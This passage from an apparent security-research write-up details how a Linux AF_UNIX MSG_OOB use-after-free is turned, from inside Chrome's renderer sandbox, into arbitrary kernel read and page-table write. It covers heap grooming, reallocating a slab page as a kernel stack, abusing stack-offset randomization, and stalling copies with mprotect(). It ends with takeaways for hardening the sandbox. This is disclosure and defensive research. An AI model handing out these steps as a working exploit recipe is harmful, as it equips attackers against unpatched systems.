But a remaining issue is that when this function discovers a remaining-length-0 SKB left behind by recv(..., MSG_OOB), it skips ahead to the next SKB and assumes that it is not also a remaining-length-0 SKB. If this assumption is broken, manage_oob() can return a pointer to the second remaining-length-0 SKB, which is bad because the caller unix_stream_read_generic() does not expect to see remaining-length-0 SKBs:
If MSG_PEEK is not set (which is the only case in which SKBs can actually be freed), skip is always 0, and the while (skip >= unix_skb_len(skb)) loop condition should always be false; but when a remaining-length-0 SKB unexpectedly gets here, the condition turns into 0 >= 0, and the loop skips ahead to the first SKB that does not have remaining length 0. That SKB could be the ->oob_skb; in which case this again bypasses the logic in manage_oob() that is supposed to set ->oob_skb to NULL before the current ->oob_skb can be freed.
So the remaining bug can be triggered by first doing the following twice, creating two remaining-length-0 SKBs in the ->sk_receive_queue:
send(socks[1], "A", 1, MSG_OOB);
recv(socks[0], &dummy, 1, MSG_OOB);
If another OOB SKB is then sent with send(socks[1], "A", 1, MSG_OOB), the ->sk_receive_queue will look like this:
SKB 1: unix_skb_len()=0
SKB 2: unix_skb_len()=0
SKB 3: unix_skb_len()=1 <--OOB pointer
Now, recv(socks[0], &dummy, 1, 0) will trigger the bug and free SKB 3 while leaving ->oob_skb pointing to it; making it possible for subsequent recv() syscalls with MSG_OOB to use the dangling pointer.
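The queue evolution above can be illustrated with a deliberately simplified toy model of the receive queue (plain Python, not kernel code; the real manage_oob() logic is more involved):

```python
class SKB:
    def __init__(self, length):
        self.len, self.consumed, self.freed = length, 0, False
    def remaining(self):              # models unix_skb_len()
        return self.len - self.consumed

class Sock:
    def __init__(self):
        self.queue, self.oob_skb = [], None

def send_oob(s):
    skb = SKB(1)                      # queue_oob(): one byte of OOB data
    s.queue.append(skb)
    s.oob_skb = skb

def recv_oob(s):
    skb = s.oob_skb                   # unix_stream_recv_urg()
    skb.consumed += 1                 # SKB stays queued, remaining length -> 0
    s.oob_skb = None

def recv_normal(s):
    skb = s.queue[0]
    if skb.remaining() == 0:          # manage_oob(): drop ONE spent SKB...
        s.queue.pop(0)
        skb.freed = True
        skb = s.queue[0]
        if skb is s.oob_skb:          # ...and only check the SKB it returns
            s.oob_skb = None
    while 0 >= skb.remaining():       # caller's skip loop: a SECOND spent SKB
        skb = s.queue[s.queue.index(skb) + 1]   # is skipped with no oob check
    s.queue.remove(skb)               # consume and free the 1-byte SKB
    skb.freed = True

s = Sock()
for _ in range(2):
    send_oob(s); recv_oob(s)          # two remaining-length-0 SKBs queued
send_oob(s)                           # SKB 3, referenced by ->oob_skb
recv_normal(s)                        # frees SKB 3...
assert s.oob_skb is not None and s.oob_skb.freed   # ...->oob_skb now dangles
```

With only a single remaining-length-0 SKB in front of the OOB SKB, the check in the manage_oob() stage fires and the pointer is cleared correctly; it is the second spent SKB that sidesteps it.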
The initial primitive
This bug yields a dangling ->oob_skb pointer. Pretty much the only way to use that dangling pointer is the recv() syscall with MSG_OOB, either with or without MSG_PEEK, which is implemented in unix_stream_recv_urg(). (There are other codepaths that touch it, but they're mostly just pointer comparisons, with the exception of the unix_ioctl() handler for SIOCATMARK, which is blocked in Chrome's seccomp sandbox.)
At a high level, the call to state->recv_actor() (which goes down the call path unix_stream_read_actor -> skb_copy_datagram_msg -> skb_copy_datagram_iter -> __skb_datagram_iter(cb=simple_copy_to_iter)) gives a read primitive: it is trying to copy one byte of data referenced by the oob_skb to userspace, so by replacing the memory pointed to by oob_skb with controlled, repeatedly writable data, it is possible to repeatedly cause copy_to_user(<userspace pointer>, <kernel pointer>, 1) with arbitrary kernel pointers. As long as MSG_PEEK is set, this can be repeated; the ->oob_skb pointer is only cleared when MSG_PEEK is clear.
The only write primitive this bug yields is the increment UNIXCB(oob_skb).consumed += 1 that happens when MSG_PEEK is not set. In the build I'm looking at, the consumed field that is incremented is located 0x44 bytes into the oob_skb, an object which is effectively allocated with an alignment of 0x100 bytes. This means that, if the write primitive is applied to a 64-bit length value or a pointer, it would have to do an increment at offset 4 relative to the 8-byte aligned overwrite target, and it would effectively increment the 64-bit pointer/length by 4 GiB.
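The 4 GiB figure follows from little-endian layout: a u32 increment at byte offset 4 of an 8-byte-aligned 64-bit value adds 2^32 to it. A quick sketch (the value 0x1000 is just an example):

```python
import struct

value = 0x1000                        # hypothetical 64-bit pointer/length
buf = bytearray(struct.pack('<Q', value))

# the write primitive: `consumed += 1` on the u32 at offset 4 into the object
lo = struct.unpack_from('<I', buf, 4)[0]
struct.pack_into('<I', buf, 4, (lo + 1) & 0xFFFFFFFF)

assert struct.unpack('<Q', buf)[0] == value + (1 << 32)  # bumped by 4 GiB
```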
My exploit for this issue
Discarded strategy for using the write primitive: Pointer increment
It would be possible to free the sk_buff and reallocate it as some structure containing a pointer at offset 0x40. The write primitive would effectively increment this pointer by 4 GiB (because it would increment by 1 at an offset 4 bytes into the pointer). But this would fundamentally rely on the machine having significantly more than 4 GiB of RAM, which feels gross and a bit like cheating.
Overall strategy
Since this issue relatively straightforwardly leads to a semi-arbitrary read (subject to usercopy hardening restrictions), but the write primitive is much more gnarly, I decided to go with the general approach of: first get the read primitive working; then use the read primitive to assist in exploiting the write primitive. This way, ideally everything after the read primitive bootstrapping can be made reliable with enough work.
Dealing with per-cpu state
Lots of things in this exploit rely on per-cpu kernel data structures and will fail if a task is migrated between CPUs at the wrong time. In some places in the exploit, I repeatedly check which CPU the exploit is running on with sched_getcpu(), and retry if the CPU number changed; though I was too lazy to do that everywhere perfectly, and this could be done even better by relying more directly on the "restartable sequences" subsystem.
The kernel's rseq subsystem maintains a struct rseq in userspace for each thread, which contains the cpu_id that the thread is currently running on; if rseq is available, glibc will read from the rseq struct.
On x86-64, the vDSO contains a pure-userspace implementation of the getcpu() syscall which relies on either the RDPID instruction or, if that is not available, the LSL instruction to determine the ID of the current CPU without having to perform a syscall. (This is implemented in vdso_read_cpunode() in the kernel sources, which is compiled into the vDSO that is mapped into userspace.)
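The retry pattern itself is simple; here is a sketch with an injectable CPU-ID reader (in the real exploit this would be sched_getcpu(); the fake trace below just makes the example deterministic):

```python
def run_on_stable_cpu(op, current_cpu):
    # repeat `op` until it ran start-to-finish on a single CPU;
    # `current_cpu` is a callable returning the current CPU ID
    while True:
        before = current_cpu()
        result = op()
        if current_cpu() == before:
            return result

# deterministic fake: pretend the task migrates once, mid-operation
cpu_trace = iter([0, 1, 1, 1])        # before, after, before, after
result = run_on_stable_cpu(lambda: "done", lambda: next(cpu_trace))
assert result == "done"
```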
Setting up the read primitive - mostly boring spraying
On the targeted Debian kernel, struct sk_buff is in the skbuff_head_cache SLUB cache, which normally uses order-1 unmovable pages. I had trouble finding a good reallocation primitive that also uses order-1 pages (though maple_node might have been an option); so I went for reallocation as a pipe page (order-0 unmovable), though that means that the reallocation will go through the buddy allocator and requires the order-0 unmovable list to become empty so that an order-1 page is split up.
This is not very novel, so I will only describe a few interesting aspects of the strategy here - if you want a better understanding of how to free a SLUB page and reallocate it as something else, there are plenty of existing writeups, including one I wrote a while ago (section "Attack stage: Freeing the object's page to the page allocator"), though that one does not discuss the buddy allocator.
To make it more likely for a reallocation of an order-1 page as an order-0 page to succeed, the exploit starts by allocating a large number of order-0 unmovable pages to drain the order-0 and order-1 unmovable freelists. Most ways of allocating large amounts of kernel memory are limited in the sandbox; in particular, the default file descriptor table size soft limit (RLIMIT_NOFILE) is 4096 on Debian (Chrome leaves this limit as-is), and I can neither use setrlimit() to bump that number up (due to seccomp) nor create subprocesses with separate file descriptor tables. (A real exploit might be able to work around this by exploiting several renderer processes, though that seems like a pain.) The one primitive I have for allocating large amounts of unmovable pages is page tables: by creating a gigantic anonymous VMA (read-only to avoid running into Chrome's RLIMIT_DATA restrictions) and then triggering read faults all over this VMA, an unlimited number of page tables can be allocated. I use this to spam around 10% of total RAM with page tables. (To figure out how much RAM the machine has, I'm testing whether mmap() works with different sizes, relying on the OVERCOMMIT_GUESS behavior of __vm_enough_memory(); though that doesn't actually work precisely in the sandbox due to the RLIMIT_DATA limit. A cleaner and less noisy way might be to actually fill up RAM and use mincore() to figure out how large the working set can get before pages get swapped out or discarded.)
Afterwards, I create 41 UNIX domain sockets and use them to spam 256 SKB allocations each; since each SKB uses 0x100 bytes, this allocates a bit over 2.5 MiB of kernel memory. That is enough to later flush a slab page out of both SLUB's per-cpu partial list as well as the page allocator's per-cpu freelist, all the way into the buddy allocator.
Then I set up a SLUB page containing a dangling pointer, try to flush this page all the way into the buddy allocator, and reallocate it as a pipe page by using 256 pipes to each allocate 2 pages (which is the minimum size that a pipe always has, see PIPE_MIN_DEF_BUFFERS). This allocates 256 * 2 * 4 KiB = 2 MiB worth of order-0 pages.
At this point, I have probably reallocated the SKB as a pipe page; but I don't know in which pipe the SKB is located, or at which offset. To figure that out, I store fake SKBs in the pipe pages that point to different data; then, by triggering the bug with recv(..., MSG_OOB|MSG_PEEK), I can read one byte at the pointed-to location and narrow down in which pipe, and at which offset, the SKB is. I don't know the addresses of any kernel objects yet; but the x86-64 implementation of copy_to_user() is symmetric and also works if you pass a userspace pointer as the source, so I can simply use userspace data pointers in the crafted SKBs for now. (SMAP is not an issue here - SMAP is disabled for all memory accesses in copy_to_user(). On x86-64, copy_to_user() is actually implemented as a wrapper around copy_user_generic(), which is a helper that accepts both kernel and userspace addresses as source and destination.)
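One way to realize the narrowing step (a sketch of the idea, not necessarily the reproducer's exact encoding): give every candidate fake-SKB slot its own userspace tag byte. Since MSG_PEEK lets the one-byte read be repeated while userspace rewrites those tags between reads, k rounds of reads can distinguish up to 256**k candidates:

```python
def tag_for(candidate_id, round_no):
    # byte that userspace writes into candidate `candidate_id`'s buffer
    # before leak round `round_no`
    return (candidate_id >> (8 * round_no)) & 0xFF

def identify(leaked_bytes):
    # reassemble the candidate ID from one leaked byte per round
    cid = 0
    for round_no, b in enumerate(leaked_bytes):
        cid |= b << (8 * round_no)
    return cid

# e.g. 8192 candidates (256 pipes x 32 0x100-byte slots; illustrative
# numbers) need two rounds of one-byte reads
secret = 0x1ABC                       # which slot the dangling SKB landed on
leaks = [tag_for(secret, r) for r in range(2)]
assert identify(leaks) == secret
```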
Afterwards, I have the ability to call copy_to_user(..., 1) on arbitrary kernel pointers through recv(..., MSG_OOB|MSG_PEEK) using the controlled SKB.
Properties of the read primitive
One really cool aspect of a copy_to_user()-based read primitive on x86-64 is that it doesn't crash even when called on invalid kernel pointers - if the kernel memory access fails, the recv() syscall will simply return an error (-EFAULT).
The main limitation is that usercopy hardening (__check_object_size()) will catch attempts to read from some specific memory ranges:
Ranges that wrap around - not an issue here, only ranges of length 1 can be used anyway.
Addresses <=16 - not an issue here.
The kernel stack of the current process, if some other criteria are met. Not an issue here - even if I want to read from a kernel stack, I'll probably want to read the kernel stack of another thread, which isn't protected.
The kernel .text section - all of .data and such is accessible, just .text is restricted. When targeting a specific kernel build, that's not really relevant.
kmap() mappings - those don't exist on x86-64.
Freed vmalloc allocations, or ranges that straddle the bounds of a vmalloc allocation. Not an issue here.
Ranges in the direct mapping, or in the kernel image address range, that straddle the bounds of a high-order folio. Not an issue here, only ranges of length 1 can be used anyway.
Ranges in the direct mapping, or in the kernel image address range, that are used as SLUB pages in non-kmalloc slab caches, at offsets not allowed by usercopy allowlisting (see __check_heap_object()). This is the most annoying part.
(There might be other ways of using this bug to read memory with different constraints, like by using the frag_iter->len read in __skb_datagram_iter() to influence an offset from which known data is subsequently read, but that seems like a pain to work with.)
Locating the kernel image
To break KASLR of the kernel image at this point, there are lots of options, partially thanks to copy_to_user() not crashing on access to invalid addresses; but one nice option is to read an Interrupt Descriptor Table (IDT) entry through the read-only IDT mapping at the fixed address 0xfffffe0000000000 (CPU_ENTRY_AREA_RO_IDT_VADDR), which yields the address of a kernel interrupt handler.
Using the read primitive to observe allocator state and other things
From here on, my goal is to use the read primitive to assist in exploiting the write primitive; I would like to be able to answer questions like:
What is the mapping between struct page */struct ptdesc */struct slab * and the corresponding region in the direct mapping? (This is easy and just requires reading some global variables out of the .data/.bss sections.)
At which address will the next sk_buff allocation be?
What is the current state of this particular page?
Where are my page tables located, and which physical address does a given virtual address map to?
Because usercopy hardening blocks access to objects in specialized slabs, reading the contents of a struct kmem_cache is not possible, because a kmem_cache is allocated from a specialized slab type which does not allow usercopy. But there are many important pieces of kernel memory that are readable, so it is possible to work around that:
The kernel .data/.bss sections, which contain things like pointers to kmem_cache instances.
The vmemmap region, which contains all instances of struct page/struct folio/struct ptdesc/struct slab (these types all together effectively form a union) which describe the status of each page. These also contain things like a SLUB freelist head pointer; a pointer to the kmem_cache associated with a given SLUB page; or an intrusive linked list element tying together the root page tables of all processes.
Kernel stacks of other threads (located in vmalloc memory).
Per-CPU memory allocations (located in vmalloc memory), which are used in particular for memory allocation fastpaths in SLUB and the page allocator; and also the metadata describing where the per-cpu memory ranges are located.
Page tables.
So to observe the state of the SLUB allocator for a given slab cache, it is possible to first read the corresponding kmem_cache* from the kernel .data/.bss section, then scan through all per-cpu memory for objects that look like a struct kmem_cache_cpu (with a struct slab * and a freelist pointer pointing into the corresponding direct mapping range), and check which kmem_cache the struct slab's kmem_cache* points to, to determine whether the kmem_cache_cpu is for the right slab cache. Afterwards, the read primitive can be used to read the slab cache's per-cpu freelist head pointer out of the struct kmem_cache_cpu.
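A sketch of that scanning approach, with the one-byte read primitive abstracted as read8(addr) returning an int or None on fault (all addresses, offsets and the field layout here are made up for illustration):

```python
def read_u64(read8, addr):
    # build a 64-bit read out of eight 1-byte reads; None if any byte faults
    val = 0
    for i in range(8):
        b = read8(addr + i)
        if b is None:
            return None
        val |= b << (8 * i)
    return val

def find_kmem_cache_cpu(read8, percpu_base, percpu_size, direct_map,
                        wanted_kmem_cache, slab_cache_offset):
    # scan per-cpu memory for something shaped like a kmem_cache_cpu:
    # a freelist pointer into the direct mapping next to a slab pointer
    # whose slab->slab_cache points at the kmem_cache we want
    lo, hi = direct_map
    for addr in range(percpu_base, percpu_base + percpu_size, 8):
        freelist = read_u64(read8, addr)
        if freelist is None or not (lo <= freelist < hi):
            continue
        slab = read_u64(read8, addr + 8)
        if slab is None:
            continue
        if read_u64(read8, slab + slab_cache_offset) == wanted_kmem_cache:
            return addr
    return None

# demo on a fake memory image (all values are arbitrary illustration)
def write_u64(mem, addr, val):
    for i in range(8):
        mem[addr + i] = (val >> (8 * i)) & 0xFF

mem = {}
write_u64(mem, 0x10010, 0x100500)     # plausible freelist pointer
write_u64(mem, 0x10018, 0x50000)      # plausible struct slab pointer
write_u64(mem, 0x50020, 0xDEAD0)      # fake slab->slab_cache
read8 = mem.get                       # unmapped byte -> None, like -EFAULT
assert find_kmem_cache_cpu(read8, 0x10000, 0x40, (0x100000, 0x200000),
                           0xDEAD0, 0x20) == 0x10010
```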
To observe the state of a struct page/struct slab/..., the read primitive can be used to simply read the page's refcount and mapcount (which contains type information). This makes it possible to observe things like "has this page been freed yet or is it still allocated" and "as what type of page has this page been reallocated".
To locate the page table root of the current process, it is similarly not possible to directly go through the mm_struct because that is allocated from a specialized slab type which does not allow usercopy (except in the saved_auxv field). But one way to work around this is to instead walk the global linked list of all root page tables (pgd_list), which stores its elements inside struct ptdesc, and search for a struct ptdesc which has a pt_mm field that points to the mm_struct of the current process. The address of this mm_struct can be obtained from the per-cpu variable cpu_tlbstate.loaded_mm. Afterwards, the page tables can be walked through the read primitive.
Finding a reallocation target: The magic of CONFIG_RANDOMIZE_KSTACK_OFFSET
Having already discarded the "bump a pointer by 4 GiB" and "reallocate as a maple tree node" strategies, I went looking for some other allocation which would place an object such that incrementing the value at address 0x...44 leads to a nice primitive. It would be nice to have something there like an important flags field, or a length specifying the size of a pointer array, or something like that. I spent a lot of time looking at various object types that can be allocated on the kernel heap from inside the Chrome sandbox, but found nothing great.
Eventually, I realized that I had been going down the wrong path. Clearly trying to target a heap object was foolish, because there is something much better: It is possible to reallocate the target page as the topmost page of a kernel stack!
That might initially sound like a silly idea; but Debian's kernel config enables CONFIG_RANDOMIZE_KSTACK_OFFSET=y and CONFIG_RANDOMIZE_KSTACK_OFFSET_DEFAULT=y, causing each syscall invocation to randomly shift the stack pointer down by up to 0x3f0 bytes, with 0x10 bytes granularity. That is supposed to be a security mitigation, but works to my advantage when I already have an arbitrary read: instead of having to find an overwrite target that is at a 0x44-byte distance from the preceding 0x100-byte boundary, I effectively just have to find an overwrite target that is at a 0x4-byte distance from the preceding 0x10-byte boundary, and then keep doing syscalls and checking at what stack depth they execute until I randomly get lucky and the stack lands in the right position.
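The hit rate can be worked out concretely: the shift is one of 64 multiples of 0x10 (0x0 through 0x3f0), and for any stack slot whose offset is 4 mod 0x10, exactly 4 of those 64 shifts place the slot at 0x44 past a 0x100 boundary, so roughly 1 in 16 syscalls lands right (SLOT below is a hypothetical stack offset):

```python
SLOT = 0x1F4   # hypothetical offset of the target stack slot; 4 mod 0x10
assert SLOT % 0x10 == 4

shifts = [i * 0x10 for i in range(0x40)]          # 0x0 .. 0x3f0
hits = [s for s in shifts if (SLOT - s) % 0x100 == 0x44]

assert len(hits) == 4       # 4 of 64 shifts line it up: 1/16 per syscall
```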
With that in mind, I went looking for an overwrite target on the stack, strongly inspired by Seth's exploit that overwrote a spilled register containing a length used in copy_from_user. Targeting a normal copy_from_user() directly wouldn't work here - if I incremented the 64-bit length used inside copy_from_user() by 4 GiB, then even if the copy failed midway through due to a userspace fault, copy_from_user() would try to memset() the remaining kernel memory to zero.
I discovered that, on the codepath pipe_write -> copy_page_from_iter -> copy_from_iter, the 64-bit length variable bytes of copy_page_from_iter() is stored in register R14, which is spilled to the stack frame of copy_from_iter(); and this stack spill is in a stack location where I can clobber it.
When userspace calls write() on a pipe, the kernel constructs an iterator (struct iov_iter) that encapsulates the userspace memory range passed to write(). (There are different types of iterators that can encapsulate a single userspace range, a set of userspace ranges, or various types of kernel memory.) Then, pipe_write() (which is called anon_pipe_write() in newer kernels) essentially runs a loop which allocates a new pipe_buffer slot in the pipe, places a new page allocation in this pipe buffer slot, and copies up to a page worth of data (PAGE_SIZE bytes) from the iov_iter to the pipe buffer slot's page using copy_page_from_iter(). copy_page_from_iter() effectively receives two length values: The number of bytes that fit into the caller-provided page (bytes, initially set to PAGE_SIZE here) and the number of bytes available in the struct iov_iter encapsulating the userspace memory range (i->count). The amount of data that will actually be copied is limited by both.
If I manage to increment the spilled register R14 which contains bytes by 4 GiB while copy_from_iter() is busy copying data into the kernel, then after copy_from_iter() returns, copy_page_from_iter() will effectively no longer be bounded by bytes, only by i->count (based on the length userspace passed to write()); so it will do a second iteration, which copies into out-of-bounds memory behind the pipe buffer page. If userspace calls write(fd, buf, 0x3000), and the overwrite happens in the middle of copying bytes 0x1000-0x1fff of the userspace buffer into the second pipe buffer page, then bytes 0x2000-0x2fff will be written out-of-bounds behind the second pipe buffer page, at which point i->count will drop to 0, terminating the operation.
Reallocating a SLUB page as a stack page, with arb-read assistance
So to get the ability to increment-after-free a value in a stack page, I again start by draining the low-order page allocator caches. But this time, the arb-read can be used to determine when an object at the right in-page offset is at the top of the SLUB freelist for the sk_buff SLUB cache; and the arb-read can also determine whether I managed to allocate an entire slab page worth of objects, with no other objects mixed in. Then, when flushing the page out of the SLUB allocator, the arb-read helps to verify that the page really has been freed (its refcount field should drop to 0); and afterwards, the page is flushed out of the page allocator's per-cpu freelist.
Then, to reallocate the page, I run a loop that first allocates a pipe page, then checks the refcount field of the target page. If the refcount of the target page goes up, I probably found the target page, and can exit the loop; otherwise, I free the pipe page again, reallocate it as a page table to drain the page away, and try again. (Directly allocating as a page table would be cumbersome because page tables have RCU lifetime, so once a page has been allocated as a page table, it is hard to reallocate it. Keeping drained pages in pipe buffers might not work well due to the low file descriptor table size, and each pipe FD pair potentially only being able to reference two pages.)
Once I have reallocated the target page as a pipe buffer, I free it again, then free three more pages (from other helper pipes), and then create a new thread with the clone() syscall. If everything goes well, clone() will allocate four pages for the new kernel stack: First the three other pages I freed last, and then the target page as the last page of the stack. By walking the page tables, I can verify that the target page really got reused as the last page of the target stack.
Remaining prerequisites for using the write primitive
At this point, I have the write primitive set up such that I can trigger it on a specific stack memory location. The write primitive essentially first reads some surrounding (stack) memory (in unix_stream_read_actor() and its callees skb_copy_datagram_msg -> skb_copy_datagram_iter) and expects that memory to have a certain structure before incrementing the value at a specific stack location.
I also know what stack allocation I want to overwrite.
The remaining issues are:
I need to ensure that an OOB copy_from_user() behind a pipe buffer page will overwrite some data that helps in compromising the kernel.
I need to be able to detect at what stack depth pipe_write() is running, and depending on that either try again or proceed to trigger the bug.
The UAF reads preceding the UAF increment need to see the right kind of data to avoid crashing.
copy_from_iter() needs to take enough time to allow me to increment a value in its stack frame.
Selecting an OOB overwrite target
Page tables have several nice properties here:
It is easy for me to cause allocation of as many page tables as I want.
I can easily determine the physical and kernel-virtual addresses of page tables that the kernel has allocated for my process (by walking the page tables with the arb read).
They are order-0 unmovable allocations, just like pipe buffers, so the page allocator will allocate them in the same 2MiB pageblocks.
So I am choosing to use the OOB copy_from_user() to overwrite a page table.
This requires that I can observe where my pipe buffer pages are located; for that, I again use the SLUB per-cpu freelist observing trick, this time on the kmalloc-cg-192 slab cache, to figure out where a newly created pipe's pipe_inode_info is located. From there, I can walk to the pipe's pipe_buffer array, which contains pointers to the pages used by the pipe.
With the ability to observe both where my page tables are located and where pipe buffer pages are allocated, I can essentially alternate between allocating page tables and allocating pipe buffer pages until I get two that are adjacent.
Detecting pipe_write() stack depth
To run pipe_write() with a write() syscall such that I can reliably determine at which depth the function is running and decide whether to go ahead with the corruption, without having to race, I can prepare a pipe such that it initially only has space for one more pipe_buffer, and then call write() with a length of 0x3000. This will cause pipe_write() to first store 0x1000 bytes in the last free pipe_buffer slot, then wait for space to become available again. From another thread, it is possible to detect when pipe_write() has used the last free pipe_buffer slot by repeatedly calling poll() on the pipe: When poll() stops reporting that the pipe is ready for writing (POLLOUT), pipe_write() must have used up the last free pipe_buffer slot.
At that point, I know that the syscall entry part of the kernel stack is no longer changing. To check whether the syscall is executing at a specific depth, it is enough to check whether the return address for the return from x64_sys_call to do_syscall_64 is at the expected position on the kernel stack using the arb read - it can't be a return address left from a preceding syscall because the same stack location where that return address is stored is always clobbered by a subsequent call to syscall_exit_to_user_mode at the end of a syscall.
If the stack randomization is the correct one, I can then do more setup and resume pipe_write() by using read() to clear pipe buffer entries; otherwise, I will use read() to clear pipe buffer entries, let pipe_write() run to completion, and try again.
Letting the reads in the increment primitive see the right data
The increment primitive happens on this call graph: a recv(..., MSG_OOB) on the UNIX domain socket enters unix_stream_read_actor(), whose callees skb_copy_datagram_msg -> skb_copy_datagram_iter perform the reads before the UAF increment.
A promising aspect here is that this codepath first does all the reads; then it does a linked list walk through attacker-controlled pointers with skb_walk_frags(); and then it does the write. skb_walk_frags() is defined as follows:
So if I run recv(..., MSG_OOB) on the UNIX domain socket while the dangling ->oob_skb pointer points to data I control, and craft that fake SKB such that its skb_shinfo(skb)->frag_list points to another fake SKB with ->len=0 and a ->next pointer pointing back to itself, I can cause the syscall to get stuck in an infinite loop. It will keep looping until I replace the ->next pointer with NULL, at which point it will perform just the UAF increment.
This is great news: instead of needing to ensure that the stack contains the right data for the UAF reads and the overwrite target for the UAF increment at the same time, I can first place controlled data on the stack, and then afterwards separately place the overwrite target on the stack.
To place controlled data on the stack, I initially considered using select() or poll(), since I know that those syscalls copy large-ish amounts of data from userspace onto the stack; however, those have the disadvantage of immediately validating the supplied data, and it would be hard to make them actually stay in the syscall, rather than immediately returning out of the syscall with an error and often clobbering the on-stack data array in the process.

Eventually I discovered that sendmsg() on a datagram-oriented UNIX domain socket works great for this: ___sys_sendmsg(), which implements the sendmsg() syscall, will import the destination address pointed to by msg->msg_name into a stack buffer (struct sockaddr_storage address), then call into the protocol-specific ->sendmsg handler - in the case of datagram-oriented UNIX domain sockets, unix_dgram_sendmsg(). This function coarsely validates the structure of the destination address (checking that it specifies the AF_UNIX family and is no larger than struct sockaddr_un), then waits for space to become available in the socket's queue before doing anything else with the destination address. This makes it possible to place 108 bytes of controlled data on a kernel stack, and that data will stay there until the syscall can continue or bail out when space becomes available in the socket queue or the socket is shut down. I actually need a bit more data on the stack, but luckily the struct iovec iovstack[UIO_FASTIOV] is directly in front of the address, and unused elements at the end of the iovstack are guaranteed to be zeroed thanks to CONFIG_INIT_STACK_ALL_ZERO=y, which happens to be exactly what I need.
It would be helpful to be able to reliably wait for the sendmsg() syscall to enter the kernel and copy the destination address onto the kernel stack before inspecting the state of its stack; this is luckily possible by supplying a single-byte "control message" via msg->msg_control and msg->msg_controllen, which will mostly be ignored because it is too small to be a legitimate control message, but will be copied onto the kernel stack in ____sys_sendmsg() after the destination address has been copied onto the stack. It is possible to detect from userspace when this kernel access to msg->msg_control happens by pointing it to a userspace address which is not yet populated with a page table entry, then polling mincore() on this userspace address.
So now my strategy is roughly:
In a loop, call sendmsg() on the thread whose kernel stack the dangling ->oob_skb pointer points into, placing a fake SKB on the stack, until the fake SKB lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET; and have that fake SKB's skb_shinfo(skb)->frag_list point to a second fake SKB with a ->next pointer that refers back to itself. (This second fake SKB can be placed anywhere I want, so I'm putting it in a userspace-owned page, so that userspace can directly write into it.)
On a second thread, use recv(..., MSG_OOB) on a UNIX domain socket to dereference the dangling ->oob_skb pointer; this syscall will start looping endlessly, following the ->next pointer.
On the thread that called sendmsg() before, now call write(..., 0x3000) on a pipe with one free pipe_buffer slot in a loop until the syscall handler lands at the right stack offset thanks to CONFIG_RANDOMIZE_KSTACK_OFFSET.
Let the pipe write() continue, and wait until it is in the middle of copying data from userspace memory to a pipe buffer page.
Set the ->next pointer in the second fake SKB to NULL, so that the recv(..., MSG_OOB) on the UNIX domain socket stops looping, performs the UAF increment, and returns.
Wait for the pipe write() to finish, at which point the page table behind the pipe data page should have been overwritten with controlled data.
Slowing down copy_from_iter()
I need to slow down a copy_from_iter() call. There are several strategies for this that don't work (or don't work well) in a Chrome renderer sandbox:
userfaultfd: not accessible in the Chrome Desktop renderer sandbox, and nowadays usually nerfed anyway such that only root can use it to intercept usercopy operations
FUSE: not accessible in the Chrome Desktop renderer sandbox
causing lots of major page faults: I'm not sure if there is some indirect way to get a file descriptor to a writable on-disk file; but either way, this seems like it would be a pain from a renderer.
But as long as only a single userspace memory read needs to be delayed, there is another option: I can create a very large anonymous VMA; fill it with mappings of the 4KiB zeropage; ensure that no page is mapped at one specific location in the VMA (for example with madvise(..., MADV_DONTNEED), which zaps page table entries in the specified range); and then have one thread run an mprotect() operation on this large anonymous VMA while another thread tries to access the part of the userspace region where no page is currently mapped. The mprotect() operation will keep the VMA write-locked while it walks through all the associated page table entries, modifies the page table entries as required, and performs TLB flushes if necessary; so a concurrent page fault in this VMA will have to wait until the mprotect() has finished. One limitation of this technique is that the part of the accessed userspace range that causes the slowdown will be filled with zeroes; but that can just be a single byte at the start or end of the range being copied, so it's not a major limitation.
Based on some rough testing on my machine, if mprotect() has to iterate through 128 MiB of page tables populated with zeropage mappings, it takes something like 500-1000ms depending on which way the page table entries are changed.
Page table control
Putting all this together, I can overwrite the contents of a page table with controlled data. I'm using that controlled write to place a new entry in the page table that points back to the page table, effectively creating a userspace mapping of the page table; and then I can use this to map arbitrary kernel memory writably into userspace.
My exploit demonstrates its ability to modify kernel memory with this by using it to overwrite the UTS information printed by uname.
Takeaway: Chrome sandbox attack surface
One thing that stood out to me about this is that I was able to use a somewhat large number of kernel interfaces in this exploit; in particular:
interface: usecase
anonymous VMA creation: page table allocations
madvise(): fast VMA splitting and merging
AF_UNIX SOCK_STREAM sockets: triggering the bug; SKB allocation and freeing
sched_getcpu() (via syscall-less fastpaths): interacting with per-cpu kernel structures
eventfd(): synchronization between threads
pipe(): allocation and freeing of order-0 unmovable pages with controlled contents
pipe(): stack overwrite target
AF_UNIX SOCK_DGRAM sockets: placing controlled data on the stack
sendmsg(): placing controlled data on the stack
mprotect(): slowing down copy_from_user()
munmap(): TLB flushing
madvise(..., MADV_DONTNEED): zapping PTEs for slowing down subsequent copy_from_user() or subsequently detecting copy_from_user()
mincore(): detecting copy_from_user()
clone(): racing operations on multiple threads; reallocating pages as kernel stack
poll(): detecting progress of concurrent pipe_write()
Some of these are obviously needed to implement necessary features of the sandboxed renderer; others seem like unnecessary attack surface. I hope to look at this more systematically in the future.
Takeaway: Esoteric kernel features in core interfaces are an issue for browser sandboxes
One thing I've noticed, not just with this issue, but several issues before that, is that core kernel subsystems (which are exposed in renderer sandbox policies and such) sometimes have flags that trigger esoteric ancillary features that are unintentionally exposed by Chrome's renderer sandbox. Such features seem to often be more buggy than the core feature that the policy intended to expose. Examples of this from Chrome's past include:
memfd_create() was exposed in the sandbox without checking its flags, making it possible to create HugeTLB mappings using the MFD_HUGETLB flag. There have been several bugs in HugeTLB, which is to my knowledge almost exclusively used by some server applications that use large amounts of RAM, such as databases.
pipe2() was exposed in the sandbox without checking its flags, making it possible to create "notification pipes" using the O_NOTIFICATION_PIPE flag, which behave very differently from normal pipes and are used exclusively for posting notifications from the kernel "keys" subsystem to userspace.
Takeaway: probabilistic mitigations against attackers with arbitrary read
When faced with an attacker who already has an arbitrary read primitive, probabilistic mitigations that randomize something differently on every operation can be ineffective, because the attacker can keep retrying until the arbitrary read confirms that the randomization picked a suitable value. Such mitigations can even work to the attacker's advantage by lining up memory locations that could otherwise never overlap, as done here using the kernel stack randomization feature.
Picking per-syscall random stack offsets at boot time might avoid this issue, since to retry with different offsets, the attacker would have to wait for the machine to reboot or try again on another machine. However, that would break the protection for cases where the attacker wants to line up two syscalls that use the same syscall number (such as different ioctl() calls); and it could also weaken the protection in cases where the attacker just needs to know what the randomization offset for some syscall will be.
